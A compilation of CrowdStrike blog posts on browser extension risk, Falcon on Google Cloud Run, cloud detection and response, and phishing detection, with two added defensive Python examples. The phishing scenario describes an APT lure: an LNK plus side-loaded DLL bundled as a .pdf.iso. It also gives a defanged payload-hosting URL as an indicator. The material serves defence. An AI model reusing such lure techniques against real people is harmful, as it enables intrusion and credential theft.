
Seeing the Unseen: Preventing Breaches by Spotting Malicious Browser Extensions

As workforce productivity increasingly depends on web-based applications, browsers have become essential gateways to the “connectivity economy.” According to recent data, 93% of desktop internet traffic in 2023 traversed through four popular web browsers.

With their diverse functionalities and use cases, browsers are the most used desktop applications. To further expand their utility, it’s common to install and use browser extensions: small software modules that enhance and personalize the functionality of web browsers. Users install them to tailor their browsing experience to better meet their needs and preferences, and they range from ad blockers and security tools to productivity enhancers and shopping assistants. Like regular applications, however, browser extensions can become sources of malware and be exploited by attackers, which means they carry significant risks.

In this blog, we’ll explore why browser extensions are particularly attractive to threat actors and how new capabilities in CrowdStrike Falcon® Exposure Management can help security teams detect and assess these risks to stay ahead of attackers.

What Makes Browser Extensions Problematic

When an end user installs a browser extension, the permissions granted open the door to a world of possibilities — and vulnerabilities. Depending on what’s allowed, these extensions can access a veritable treasure trove of information: everything from web traffic and saved credentials to session cookies, clipboard data and beyond. Though legitimate extensions often require such permissions to operate effectively, in the wrong hands, these permissions can become tools for exploitation, giving bad actors the keys to critical data and private information.

The rich data obtained through such means can subsequently be weaponized and monetized by criminals. For example, using privileged data, they can craft better phishing emails or use credentials harvested to carry out identity-based attacks.

CrowdStrike’s analysis of browser extensions in our production environments indicates that well over half of them require what may be considered excessive permissions. Such permissions carry significant risk: they may allow a threat actor to see all web traffic or manipulate browser tabs.

Further, because extensions are embedded into browser applications and do not create process start events, they can be harder to detect than ordinary desktop applications, allowing threat actors to hide and persist their malicious activity.

How Adversaries Deploy Malicious Extensions

Extensions can be relatively easy to develop, but they don’t typically come with a web browser out of the box. Therefore, the act of deploying malicious extensions onto target victim browsers is an important part of the tradecraft. Adversaries achieve this by employing various tactics.

One common method is to list deceptive extensions on browser stores. Deception can be achieved in a number of ways, including by mimicking legitimate well-known vendor product names or by publishing extensions with popular productivity purposes.

Another popular tactic is ownership takeover, where threat actors purchase or otherwise take over previously legitimate browser extensions that already have a user base and push out malicious updates to compromise target systems.

The most dangerous method is perhaps “sideloading,” which involves installing browser extensions from sources outside the official web store by directly adding the extension files. This method bypasses the usual safeguards that come with the browser stores. Attackers exploit this method by bundling malicious extensions with seemingly legitimate software applications. When users install these applications, the hidden extensions are also installed, granting attackers access to the users’ browser and data.

Even with the web store method, browser extensions can expand their permissions upon installation and download additional malicious payloads. This is a popular obfuscation tactic where adversaries publish extensions to web stores with minimal initial permission requirements but expand their footprint with harmful intentions. A case in point was the notorious PDF Toolbox malicious browser extension, which downloaded additional payloads upon installation to enhance its capabilities and persistence.

Figure 1. Cyber kill chain involving browser extensions.

Falcon Exposure Management for Browser Extension Visibility

Fortunately, Falcon Exposure Management, a module of the AI-native CrowdStrike Falcon® cybersecurity platform, leverages its single, lightweight agent to provide comprehensive asset visibility and instant exposure assessment. This enables security teams to further close the security gap by detecting yet another source of exposure in the form of browser extension risks.


Extension Inventory

Detecting and cataloging the very existence of extensions is the first step toward understanding their risks. With Falcon Exposure Management, security teams can compile a comprehensive inventory of all extensions installed on Chrome and Edge browsers in their enterprise environment, whether it’s Windows or macOS. This capability doesn’t just list extensions; it also offers analytics, revealing extensions with the most and least installations, the most and least usage, and much more.

Extension Risk Assessment

From here, security teams can assess extension risks in a number of ways. For starters, the installation method is shown for each extension, which uncovers sideloaded extensions and provides risk context.

Falcon Exposure Management also shows the vendor name captured from each extension, which can range from a legitimate, well-known vendor all the way to an empty or missing name field. The extension’s web store listing, if one is found, is also provided.

Perhaps the most important measure of risk is the permission level associated with each extension. Because the types of permissions can be so varied, CrowdStrike computes a heuristics-based “permission severity” rating to facilitate the ease of assessment. For example, if the permission allows the extension to “intercept web traffic,” it’s assigned a permission severity of critical. Alternatively, if the permission allows the extension to control the browser tab, it’s assigned a level of high. Falcon Exposure Management provides detailed information on permissions along with the severity rating for ease of investigation.

For a security analyst evaluating extension risk, a sideloaded extension with a “critical” permission severity rating, no corresponding store listing and a missing vendor name can signal a suspicious extension requiring further evaluation or more aggressive intervention.
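As an added example (not CrowdStrike’s code, and not how Falcon Exposure Management actually computes its rating), the script below applies a hypothetical permission-to-severity table of the kind the text describes to a constructed extension inventory. It reads each extension’s manifest.json permissions, reports the highest severity, counts installs per extension, and raises the four signals the analyst example combines (sideloaded, critical severity, no store listing, missing vendor). The inventory field names, extension ids, store URLs, the use of the manifest `author` key as the vendor name, and the severity table itself are all assumptions of this example.

```python
import json
from collections import Counter

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Hypothetical heuristic table (an assumption of this example, not Falcon's
# actual mapping): permissions that let an extension intercept web traffic or
# read session cookies rank critical; those that control or inspect tabs rank high.
PERMISSION_SEVERITY = {
    "webRequest": "critical",
    "webRequestBlocking": "critical",
    "<all_urls>": "critical",
    "cookies": "critical",
    "tabs": "high",
    "history": "high",
    "clipboardRead": "high",
    "storage": "low",
    "notifications": "low",
}


def permission_severity(manifest: dict) -> str:
    """Highest severity among the permissions a manifest.json declares."""
    declared = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
    worst = "low"
    for perm in declared:
        sev = PERMISSION_SEVERITY.get(perm, "low")  # unlisted permissions default to low
        if SEVERITY_RANK[sev] > SEVERITY_RANK[worst]:
            worst = sev
    return worst


def triage_flags(record: dict) -> list:
    """Risk signals for one installed extension: install method, permission
    severity, absence of a store listing, empty vendor (manifest 'author')."""
    manifest = record["manifest"]
    flags = []
    if record.get("install_method") == "sideloaded":
        flags.append("sideloaded")
    if permission_severity(manifest) == "critical":
        flags.append("critical-permissions")
    if not record.get("store_listing"):
        flags.append("no-store-listing")
    if not manifest.get("author", "").strip():
        flags.append("missing-vendor")
    return flags


SUSPICIOUS = {"sideloaded", "critical-permissions", "no-store-listing", "missing-vendor"}


def is_suspicious(record: dict) -> bool:
    """True when all four signals from the analyst example coincide."""
    return SUSPICIOUS <= set(triage_flags(record))


# Constructed inventory: one record per (host, extension). Ids, names and URLs are made up.
AD_BLOCKER = {"name": "Ad Blocker", "author": "Example Vendor",
              "permissions": ["webRequest", "webRequestBlocking", "storage"],
              "host_permissions": ["<all_urls>"]}
INVENTORY = [
    {"host": "ws-01", "extension_id": "aaaa", "install_method": "webstore",
     "store_listing": "https://store.example/aaaa", "manifest": AD_BLOCKER},
    {"host": "ws-02", "extension_id": "aaaa", "install_method": "webstore",
     "store_listing": "https://store.example/aaaa", "manifest": AD_BLOCKER},
    {"host": "ws-02", "extension_id": "bbbb", "install_method": "sideloaded",
     "store_listing": None,
     "manifest": {"name": "PDF Helper", "author": "",
                  "permissions": ["tabs", "cookies", "clipboardRead"]}},
    {"host": "ws-03", "extension_id": "cccc", "install_method": "webstore",
     "store_listing": "https://store.example/cccc",
     "manifest": {"name": "Notes", "author": "Example Vendor",
                  "permissions": ["storage", "notifications"]}},
]


def install_counts(records: list) -> Counter:
    """Installs per extension id, for the most/least-installed view."""
    return Counter(r["extension_id"] for r in records)


def report(records: list = INVENTORY) -> dict:
    """Per-extension summary: install count, permission severity, and whether
    any install of it matches the suspicious pattern."""
    summary = {}
    for r in records:
        entry = summary.setdefault(r["extension_id"], {
            "name": r["manifest"]["name"], "installs": 0,
            "severity": permission_severity(r["manifest"]), "suspicious": False})
        entry["installs"] += 1
        entry["suspicious"] = entry["suspicious"] or is_suspicious(r)
    return summary


if __name__ == "__main__":
    for ext_id, info in sorted(report().items(), key=lambda kv: -SEVERITY_RANK[kv[1]["severity"]]):
        print(ext_id, json.dumps(info))
```

Note that the constructed ad blocker also scores critical, which is the point the text makes: legitimate extensions often need traffic-intercepting permissions, so severity alone is a poor filter. Combining it with install method, store listing and vendor name is what narrows the list to the one sideloaded, unlisted, anonymous extension.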

Taking Actions

Beyond these insights, customers benefit from the platform’s broader capabilities to take actions on these risks. For example, security teams have the ability to configure policies to automatically group browser extensions with critical permission severities into a particular host group. They can also trigger automated actions through the native CrowdStrike Falcon® Fusion SOAR workflows, such as creating tickets to alert IT system owners to investigate or remediate suspicious extensions. Security teams can also set up automated workflows to trigger notifications via email, Slack, etc., to keep teams in the loop.

With Falcon Exposure Management, these assessments take place seamlessly and instantaneously with the Falcon agent. This allows security teams to monitor their overall attack surface in its various forms, leaving adversaries nowhere to hide.


Figure 2. Falcon Exposure Management browser extensions dashboard and details.

Get Started Today

If you’re an existing Falcon Exposure Management or CrowdStrike Falcon® Discover customer, give the browser inventory capability a try by going to Exposure Management > Applications > Dashboards to view the new browser extensions overview dashboard and see extension-specific data. If you’re not using these modules already, talk to your CrowdStrike representative to request a demo.


Falcon Cloud Security Supports Google Cloud Run to Strengthen Serverless Application Security

26 June 2024 at 19:37

We’re thrilled to share that the CrowdStrike Falcon® sensor now fully supports Google Cloud Run, bringing advanced security capabilities to your serverless applications. While we announced this at Google Cloud Next in April 2024, this blog goes deeper into the integration and shares how customers leveraging Google Cloud Run and CrowdStrike can deploy Falcon quickly to enhance their serverless security requirements.

To recap, Google Cloud Run offers a powerful, fully managed platform for deploying containerized applications that scale automatically with demand. However, the dynamic and ephemeral nature of serverless environments poses unique security challenges. With the Falcon sensor now integrated with Google Cloud Run, organizations can leverage CrowdStrike’s industry-leading protection to secure their serverless workloads.

Figure 1. Google Cloud Run shown via containers in the Falcon console.

Enhanced Security for Serverless Applications

By supporting Google Cloud Run, the Falcon sensor ensures that your serverless applications benefit from the same robust security measures that protect traditional and cloud-based workloads. The AI-native CrowdStrike Falcon® cybersecurity platform provides real-time threat detection, automated incident response and comprehensive visibility into your serverless environment. This integration helps you identify and mitigate threats before they can impact your applications, ensuring continuous protection across your entire cloud infrastructure.

Figure 2. The host management dashboard in CrowdStrike Falcon® Cloud Security shares information for Google Cloud Run services.

Seamless Integration and Continuous Protection

Deploying the Falcon sensor on Google Cloud Run is straightforward and seamless, allowing you to integrate security into your DevOps processes without compromising performance or agility. The sensor automatically scales with your workloads, providing consistent protection as your application demand fluctuates. This ensures that your security posture remains strong, regardless of the size or complexity of your serverless deployments.

Figure 3. Container sensor runtime security for Google Cloud Run services in the Falcon console.

Empowering DevSecOps with Real-Time Insights

With this new support, DevSecOps teams can now gain real-time insights into the security status of their serverless applications running on Google Cloud Run. The Falcon platform’s advanced analytics and threat intelligence capabilities empower teams to make informed decisions, swiftly respond to incidents and continuously improve their security practices. This proactive approach helps organizations maintain a secure and resilient application environment, fostering innovation and agility.

We’re excited about this expansion and look forward to helping our customers enhance their security posture in serverless environments. For more information on how to deploy and configure the Falcon sensor on Google Cloud Run, Falcon platform customers can read this official documentation.

Figure 4. The Kubernetes and containers inventory dashboard in Falcon Cloud Security is where you can find Google Cloud Run service monitoring and detections.

Deployment Overview

Google Cloud Run is a fully managed serverless compute platform built from Knative that enables customers to run containers without the need to manage the underlying infrastructure. You can run your containers either fully managed with Google Cloud Run or in your Kubernetes Engine cluster with Google Cloud Run on Anthos. In Google Cloud Run, customers can deploy applications as jobs or services. The Falcon container sensor for Linux supports both job and service deployments.

The Falcon container sensor for Linux can extend runtime security to container workloads in Google Cloud Run because it runs in the user space with no code running in the kernel or the worker node OS.

Figure 5. How the Falcon sensor deploys to secure Google Cloud Run-supported containers.

Deploying the Falcon container sensor for Linux to Google Cloud Run requires modification of the application container image. The Falcon container sensor image contains a Falcon utility that supports patching the application container image with Falcon container sensor for Linux and its related dependencies.

The Falcon container consists of two components:

  1. The Falcon container sensor for Linux: At runtime, the Falcon container sensor for Linux is launched inside the application container of the service or job. It uses unique technology to run in the application context.
  2. Falcon utility: The Falcon utility runs offline and takes the application container image as an input to generate a new container image patched with the Falcon container sensor for Linux and its related dependencies. The Falcon utility also sets the Falcon entry point as the container entry point.

Here is an overview of the installation workflow:

  1. Create an API client key
  2. Get your CrowdStrike CID with checksum
  3. Retrieve the sensor image and push to Google Registry
  4. Run the Falcon utility to build a new image
  5. Push the new image to the registry
  6. Deploy the Falcon container sensor for Linux to Google Cloud Run
  7. Verify the sensor deployment

Once verification is over, you’re ready to go. For customers leveraging Google Cloud Run and CrowdStrike, this process is designed to be easy to follow and deploy.

Here’s a more detailed step-by-step guide for customers using Falcon Cloud Security.

Shaping the Future of Cloud Security

The powerful combination of AI-powered cloud services from Google Cloud and the unified protection and threat hunting capabilities of the Falcon platform provides the security that organizations need to stop breaches in multi-cloud and multi-vendor environments.

As cloud threats and technology continue to evolve, staying ahead of threats is paramount. Modern businesses need allies to protect their cloud-based resources, applications and data as their reliance on cloud technology continues to grow. This synergy between CrowdStrike and Google Cloud will shape the future of cloud technology and security, setting a new standard for protecting today’s cloud environments.


3 Crucial Capabilities for Effective Cloud Detection and Response

24 June 2024 at 16:37

Adversaries are increasingly attacking cloud environments, as evidenced by a 75% surge in cloud intrusions year-over-year in 2023. They are also getting faster: The fastest breakout time was clocked at just over 2 minutes, according to the CrowdStrike 2024 Global Threat Report.

Today’s adversaries are outpacing legacy security approaches. Disjointed point solutions can’t scale or provide visibility into a rapidly growing attack surface. As organizations adopt more cloud applications and services, they need a modern approach to detect, identify and block adversary activity in the cloud.

An effective cloud detection and response (CDR) solution provides incident management at every stage — from detection to remediation — quickly neutralizing threats with precision and efficiency:

  1. 24/7 cloud services including managed detection and response and threat hunting to monitor, analyze and neutralize cloud threats, providing complete incident lifecycle management from detection to remediation.
  2. Cloud adversary intelligence to understand adversary behavior and tactics, techniques and procedures (TTPs) to prioritize and triage incidents faster.
  3. A unified cloud-native application protection platform (CNAPP) to detect and actively stop cloud breaches in real time.

Let’s explore the key components you should be looking for in your CDR.

24/7 Cloud Managed Detection, Response and Threat Hunting

The cloud security landscape is full of challenges that often exceed the capabilities of automated systems alone. The complex nature of modern threats, and the understanding required to address them, highlights a shortfall in many organizations: a lack of skilled professionals well-versed in cloud security practices.

Integrating cloud managed detection and response into a CDR solution fills this critical gap. Seasoned security professionals can interpret and act on information from automated tools. These experts analyze, validate and prioritize threats, driving continuous enhancement of security measures and technology implementation.

Figure 1. CrowdStrike Falcon® Complete dashboard — Executive Overview

Additionally, 24/7 cloud threat hunting services extend this proactive defense. Threat hunters work around the clock, ensuring constant vigilance over the entire cloud environment, including control plane activities and cloud runtime environments. Further, they need to monitor and prevent compromised users and credentials from being exploited in cloud attacks. And finally, cloud threat hunters must track lateral movement from cloud to endpoint, enabling rapid response and actionable insights for decisive remediation.

Adversary-based Threat Intelligence

As adversaries become faster and more sophisticated, adversary-based threat intelligence helps security teams better understand their behavior and how to stop them. A CDR solution that uses adversary-based threat intelligence can significantly improve an organization’s detection and response capabilities.

Threat intelligence in the context of a CDR solution encompasses a wide array of information, ranging from indicators of attack (IOAs) to real-time data about emerging threats from adversaries around the world. Threat intelligence cannot be static — it is continuously updated based on new research and refined through machine learning algorithms and human analysis. A CDR solution using adversary-based intelligence can accelerate incident response by enabling security teams to more effectively anticipate, recognize and prioritize attacker behaviors.

Figure 2. CrowdStrike Counter Adversary Operations dashboard — Actors

Integrating adversary-based threat intelligence into a CDR solution can evolve its approach from a reactive defense to a confident and intelligence-driven defense, arming organizations with the knowledge and tools to combat sophisticated adversaries.

A Unified CNAPP

An organization can often find itself tangled up in the complexity of managing disparate tools to protect its cloud environments. This drives operational complexity and creates silos that impede the flow of crucial information, making it tough to build a full view of the organization’s cloud security posture. A unified cloud-native application protection platform (CNAPP) consolidates disparate tools into a single solution, bringing detection and response into the CDR framework.

A CDR should offer a CNAPP through a single agent and single platform. This removes the limitations of individual tools by offering end-to-end visibility across the cloud environment, enabling security teams to detect sophisticated attacks that might otherwise go unnoticed in a fragmented toolset. A unified CNAPP streamlines the workflow for incident response, allowing for faster mobilization against threats and more effective mitigation strategies.

Figure 3. CrowdStrike Falcon® Cloud Security dashboard — Public Cloud Inventory

A CNAPP enhances the efficiency of security operations while improving the effectiveness of each function. This holistic approach ensures every aspect of cloud security is addressed, from initial threat detection to final resolution, making it a critical factor to consider when selecting a CDR solution.

CrowdStrike’s Cloud Detection and Response Solution

A CDR solution is an essential piece in the fight against the latest adversary threats targeting the cloud. By providing detailed visibility, real-time monitoring, rapid response capabilities and integrated human expertise, CDR empowers organizations to proactively manage their security defenses in the complex and dynamic cloud environment.

CrowdStrike delivers the world’s only unified approach to cloud detection and response that brings together world-class adversary intelligence and elite 24/7 services with the industry’s most complete CNAPP.

With CrowdStrike’s CDR solution, organizations can:

  • Reduce cloud risks before they escalate
  • Detect threats with complete context
  • Stop breaches and rapidly investigate
  • Swiftly respond and recover

You can try Falcon Cloud Security for free through a Cloud Security Health Check. It provides instant, complete visibility into your entire cloud estate and deploys in minutes with zero impact to your business.


Stop Phishing Attacks with Next-Gen SIEM and SOAR

24 June 2024 at 16:19

Phishing is the weapon of choice for many adversaries. And it’s easy to understand why: Users fall victim to attacks in under 60 seconds on average, novice cybercriminals can launch effective phishing campaigns thanks to off-the-shelf phishing kits and generative AI, and above all, it works — 71% of organizations reported at least one successful attack in 2023.

To defend against rampant phishing attacks, organizations require robust systems to detect, investigate and respond to phishing threats. This is where CrowdStrike Falcon® Next-Gen SIEM and CrowdStrike Falcon® Fusion SOAR can deliver tremendous value, allowing you to quickly stop threats from one unified platform.

This blog shares how Falcon Next-Gen SIEM helps stop phishing attacks and why we’re offering 10GB/day of free email data ingestion to jumpstart your next-gen SIEM journey.

Detect Phishing Attacks with Falcon Next-Gen SIEM

Falcon Next-Gen SIEM empowers you to detect phishing fast by consolidating your endpoint data and third-party data on the AI-native CrowdStrike Falcon® cybersecurity platform. With a robust ecosystem of data connectors and parsers, Falcon Next-Gen SIEM simplifies the ingestion of third-party data so you can quickly detect and stop attacks.

Figure 1. Falcon Next-Gen SIEM offers numerous out-of-the-box connectors and parsers.

Legacy SIEMs burden security teams with complex and unwieldy lists of correlation rules, often developed years or decades ago. These rules create a flood of false positives, forcing specialized detection engineers to waste time tuning and maintaining them. Overwhelmed, many organizations turn to managed security service providers (MSSPs) with mixed results.

Falcon Next-Gen SIEM cuts through the pitfalls of outdated correlation rules. It delivers laser-accurate detection for both Falcon telemetry — including endpoint, cloud and identity data — and third-party logs. Crafted by CrowdStrike experts with industry-leading adversary research, our out-of-the-box correlation rules align with MITRE ATT&CK®, helping you detect attack techniques across the cyber kill chain. Your team can easily customize rules with a unified language for search, parsing and dashboards.

Figure 2. Falcon Next-Gen SIEM correlation rules are flexible and use the same common language used across all third-party data.

Figure 3. Falcon Next-Gen SIEM provides a unified view of your detections.

Monitor Threats with Live Dashboards

Next, it’s helpful to discuss how live dashboards can help you identify top threats and analyze trends to improve your security posture.

Falcon Next-Gen SIEM’s dashboard capability allows you to create custom dashboards from queries, providing at-a-glance data visualization for quick decision-making. You can view aggregated data from various email sources based on common fields and use interactions to drill down into vendor-specific data and fields.

Figure 4. Aggregate and visualize your data with the intuitive dashboard builder in Falcon Next-Gen SIEM.

Figure 5. Leverage dashboard interactions to zoom in to different views of your data, including vendor-specific fields.

Investigate and Respond with Falcon Fusion SOAR

Workflow automation offers numerous benefits, including reduced mean time to respond (MTTR), enhanced team efficiency and cost savings.

Phishing is an ideal starting point for workflow automation due to the repetition in phishing investigations and the need for consistent responses and swift action. With Falcon Fusion SOAR, the no-code orchestration, automation and response capability built into the Falcon platform, you can quickly reap the benefits of automation, empowering your team to respond more effectively to phishing threats.

With more than 125 pre-built actions and the ability to execute actions directly on the endpoint with CrowdStrike Falcon® Insight XDR, Falcon Fusion SOAR lets you orchestrate incident response across your SOC. You can easily build workflows to automatically investigate the contents of suspicious emails or reset compromised credentials, allowing your team to save valuable time and focus on higher priorities. Workflows can run on-demand or trigger automatically based on a detection or a predefined schedule.

Figure 6. Falcon Fusion SOAR lets you quickly build workflows by choosing the trigger, defining the conditions and configuring actions.

Falcon Fusion SOAR provides out-of-the-box playbook templates to simplify workflow automation. Predefined templates can be easily customized to align to your organization’s security policies and technologies.

The Incident Workbench enhances incident visualization and team collaboration. It illustrates the relationships and connections between entities, providing a clear view of the attack’s progression. Clicking on the graph reveals detailed information on each entity, including sender details, malicious URLs, indicators of compromise and relevant threat actors.

Figure 7. The Incident Workbench enhances investigation with incident visualization and expedites response with on-demand workflow automation.

A prebuilt SOAR dashboard helps you monitor team performance, executed workflows, related detections and MTTR trends. By continuously measuring your phishing KPIs, you can make ongoing improvements to your detection and response capabilities, shifting from a reactive to a proactive security approach.

Figure 8. Continuously measure and monitor SOAR KPIs to improve your security posture with the new metrics dashboard in Falcon Fusion SOAR.

Get Started with 10GB of Free Email Data Ingestion

Phishing attacks remain a persistent threat to organizations. The Falcon platform seamlessly integrates data, AI, workflow automation and threat intelligence on a unified platform for full visibility and protection against cyberthreats, including phishing attacks.

Email data can be a rich source of information for uncovering malicious activity. Starting today, Falcon Insight XDR customers get 10GB per day of free email data ingestion to kickstart their SOC transformation and realize the power of combining Falcon platform data with third-party data to detect phishing schemes, accelerate investigations and meet compliance requirements.

Contact your sales representative or technical account manager to learn more about this offering.


Harnessing Email Data to Stop Phishing Attacks with Falcon Next-Gen SIEM

21 June 2024 at 14:53

Phishing is a formidable and financially devastating threat, costing organizations $4.76 million USD per breach on average. With a simple, deceptive email, adversaries can masquerade as trusted entities, tricking even savvy individuals into handing over their credentials and other sensitive information. Whether it’s a duplicitous link or a crafty call to action, phishing remains one of the most insidious cybersecurity threats, leveraging a vulnerability that can’t be patched: human nature.

CrowdStrike Falcon® Next-Gen SIEM helps security teams detect and stop email-based attacks. By analyzing email security logs, SOC analysts can identify unusual attachments, malicious links, or email addresses to uncover attacks and speed up investigations. Email data allows analysts to trace the root cause of an attack, identify compromised accounts, and understand attackers’ methods.

This blog post demonstrates how simple it is to ingest data with Falcon Next-Gen SIEM. Then, it explains how to detect and counter phishing threats with Falcon Next-Gen SIEM, Falcon Fusion SOAR, and email data from Abnormal Security.

Maximize Your 10GB/Day Plan by Onboarding Email Data

Falcon Next-Gen SIEM transforms security operations to stop breaches by bringing together data, AI, workflow automation, and threat intelligence on one platform with one console and one lightweight endpoint agent.

To accelerate SOC transformation, Falcon Insight customers can ingest up to 10 gigabytes of third-party data per day at no additional cost, and experience the power and performance of Falcon Next-Gen SIEM. The 10GB/day offering is available today to the first wave of Falcon Insight customers and it will be released in waves to remaining customers over the next several weeks.

Make the most of your 10GB/day plan by ingesting high-value data, such as email security logs, into the Falcon platform to stop email-based threats. You can onboard email data using out-of-the-box integrations with email security solutions from Abnormal Security, Mimecast, and Proofpoint. An expanding array of data connectors support a broad set of log sources, while an HTTP event collector (HEC) lets you ingest data using prebuilt or custom parsers.

Figure: CrowdStrike Data Sources.

With Abnormal Security, data ingestion can be set up in just minutes. Start by generating an API token in the Abnormal administrator console; see the Falcon Next-Gen SIEM documentation for step-by-step instructions.

Next, create a new connector in the Falcon console by navigating to Next-Gen SIEM > Log management > Data onboarding and select the Abnormal Security Data Connector.

Figure: Abnormal Security Data Connector.

Enter the API key you generated, and Falcon Next-Gen SIEM will automatically connect to Abnormal and start ingesting data. Check out Falcon Next-Gen SIEM technical documentation for more detailed information on how to onboard data.

Defeating a Targeted Email Attack with Falcon Next-Gen SIEM

To illustrate how Falcon Next-Gen SIEM helps you combat email-based threats, let’s consider a scenario where an advanced adversary targets your organization, in this example a high-interest think tank. The adversary’s primary goal is to infiltrate your organization and gather insights. The advanced persistent threat (APT) poses as a US-based reporter inquiring about a fabricated threat assessment, targeting an employee at your think tank. Let’s explore the details of the attack:

First, the threat actor builds a payload containing the following files:

  • Malicious LNK (shortcut) file that will execute the included malware if run
  • Malware packaged as a side-loaded DLL

The malware is bundled into the following file and hosted on a remote web server.

  • Annual_Threat_Assessment_of_the_US_Intelligence_Community.pdf.iso

Then, the threat actor crafts the following email to target a member of your think tank.

Figure: Threat Actor Email.

This email attempts to entice the victim into opening the included link, since the document supposedly attached appears to be malformed. The embedded URL points to the following link.

  • http://goijosijdfouhofejwoijfoijoixyz[.]xyz/files/64019238/Annual_Threat_Assessment_of_the_US_Intelligence_Community.pdf.iso

Upon receiving this email, the victim clicks the malicious link, which opens in a new Chrome browser window.

Figure: Threat Actor Browser.

Detecting Malicious Activity

Behind the scenes, multiple third-party security products are monitoring the attack and generating detections. Your organization’s Abnormal Security platform examines the email message and flags it as suspicious.

Threat Log Details

Using machine learning models, it identifies unique or otherwise notable strings within the email and flags them for your security analyst.

AI detected notable strings

Once the email data is forwarded from Abnormal Security to CrowdStrike Falcon Next-Gen SIEM, you can view it in Advanced Event Search. The data is retained in the platform for 7 days with the 10GB/day plan, and can be stored for months or years with an optional Falcon Next-Gen SIEM subscription. Your security analysts can query the data using the intuitive and flexible CrowdStrike Query Language.

In addition to collecting email data, your team is ingesting Falcon telemetry from your endpoints. This telemetry provides visibility into DNS activity.

NG-SIEM Plan

By combining these two datasets, you can identify instances where a domain from a flagged email has been accessed. Enrich your findings with CrowdStrike threat intelligence and known indicators of compromise. To detect future threats and generate high-fidelity alerts, create a new correlation rule indicating malicious activity.

CrowdStrike correlation rule

This correlation rule generates an alert when the victim attempts to access the domain included in the malicious email.

Correlation rule detection
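The join behind that correlation rule, written out as a small added example so you can see what the rule has to get right. This is not CrowdStrike code and does not use the Falcon API or CrowdStrike Query Language; the event shapes, field names (`email_flagged`, `dns_request`, `aid`, `domain`), the indicator list and every domain in it are constructed for illustration. Two details matter in practice and are handled here: domains must be normalized (case, trailing dot, port) before the two feeds are compared, and the DNS lookup may be logged before the email verdict arrives, so DNS events are buffered and matched after all flagged emails in the window are read.

```python
"""Join domains from emails flagged by an email security product with endpoint
DNS telemetry: a lookup of a domain that arrived in a flagged email raises an
alert, and a match against a threat-intelligence indicator list raises severity.

Added example, not CrowdStrike code. Event shapes, field names and all domains
are constructed.
"""
from __future__ import annotations

import json
from urllib.parse import urlparse

# Constructed sample feed (JSON lines): two flagged-email events and DNS
# requests from several endpoints. The DNS domain casing and trailing dot are
# deliberately inconsistent with the email URLs.
SAMPLE_EVENTS = """
{"type": "email_flagged", "recipient": "analyst@example.org", "verdict": "suspicious", "urls": ["http://malicious-example.test/files/64019238/report.pdf.iso"]}
{"type": "email_flagged", "recipient": "ceo@example.org", "verdict": "suspicious", "urls": ["https://login.example.test/reset"]}
{"type": "dns_request", "aid": "host-0001", "user": "analyst", "domain": "www.example.org"}
{"type": "dns_request", "aid": "host-0001", "user": "analyst", "domain": "malicious-example.test."}
{"type": "dns_request", "aid": "host-0042", "user": "svc-backup", "domain": "update.example.org"}
{"type": "dns_request", "aid": "host-0007", "user": "jdoe", "domain": "LOGIN.EXAMPLE.TEST"}
"""

# Constructed stand-in for a threat-intelligence indicator list.
KNOWN_IOCS = {"malicious-example.test"}


def normalize_domain(value: str) -> str:
    """Lowercase, drop any :port and a trailing dot so both feeds compare equal."""
    host = value.strip().lower().split(":", 1)[0]
    return host.rstrip(".")


def domains_from_email(event: dict) -> set[str]:
    """Extract the host part of every URL carried by a flagged email."""
    hosts: set[str] = set()
    for url in event.get("urls", []):
        netloc = urlparse(url).netloc
        if netloc:
            hosts.add(normalize_domain(netloc))
    return hosts


def correlate(events_text: str) -> list[dict]:
    """Return one alert per DNS request for a domain seen in a flagged email."""
    flagged: dict[str, dict] = {}   # domain -> first flagged email carrying it
    dns_events: list[dict] = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if event["type"] == "email_flagged":
            for domain in domains_from_email(event):
                flagged.setdefault(domain, event)
        elif event["type"] == "dns_request":
            dns_events.append(event)   # evaluated after the whole window is read

    alerts = []
    for event in dns_events:
        domain = normalize_domain(event["domain"])
        email = flagged.get(domain)
        if email is None:
            continue
        alerts.append({
            "aid": event["aid"],
            "user": event["user"],
            "domain": domain,
            "recipient": email["recipient"],
            # A hit on the indicator list raises confidence in the alert.
            "severity": "high" if domain in KNOWN_IOCS else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Run as-is, the script prints two alerts: the think-tank analyst's host resolving the domain from the flagged email (severity high, since the domain is also on the indicator list) and a second host resolving a domain from another flagged message (severity medium).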

Data Visualization

You can visualize email data with custom and pre-built dashboards in Falcon Next-Gen SIEM. A versatile dashboard builder lets you select from a broad spectrum of visualization chart options and use advanced queries to create tailored dashboards.

Threat Investigation

The Incident Workbench visualizes the attack in a graph view, providing context about the entities involved. It lists key details such as users, senders, recipients, and host information.

Incident workbench

Your team can quickly understand relevant email information by viewing incident details.

Next-gen SIEM event

By pivoting on the host communicating with a remote server, you can identify the last logged-in user responsible for this network activity.

User Info

Incident Response

With Falcon Fusion SOAR, you can easily isolate the compromised host and prevent further malicious activity using workflow automation.

You can build a workflow by simply selecting the trigger, defining the conditions and configuring the actions. Falcon Fusion SOAR workflows can be triggered automatically based on a detection, on-demand when immediate response is necessary, or scheduled for routine tasks and assessments.

In this scenario, the workflow is triggered on-demand. If the “Host ID” condition is met, the workflow gathers the device details and sends an email to a senior engineer for review. If the senior engineer approves, the device will be contained. If not, the device remains uncontained, and an email documenting the actions is sent.

Fusion Flow

Additionally, Falcon Fusion SOAR offers numerous out-of-the-box phishing playbooks that can be customized to fit your organization’s requirements and technology stack.

In this scenario, multiple employees at your organization were targeted, and one reported the email as a “phishing email.” Your security team leveraged a new out-of-the-box phishing playbook template included in Falcon Fusion SOAR. Note that this playbook is not available with the 10GB/day plan; it requires the purchase of a Falcon Next-Gen SIEM subscription.

The phishing playbook template triggers upon receiving a phishing email notice from Microsoft 365. If the condition is met, the workflow writes to the log repository and initiates the investigation process. It enriches the data by searching all email components, submitting the URL for sandbox detonation, and conducting file hash lookups using VirusTotal.

Fusion Flow phishing template

If VirusTotal confirms malicious indicators, the workflow will call on the threat graph to kill the process. If the sender domain is suspicious, then the workflow has the capability to update third-party tools like Proofpoint. For risky URLs and IP addresses, the workflow will create custom IOCs to start a retroactive search.

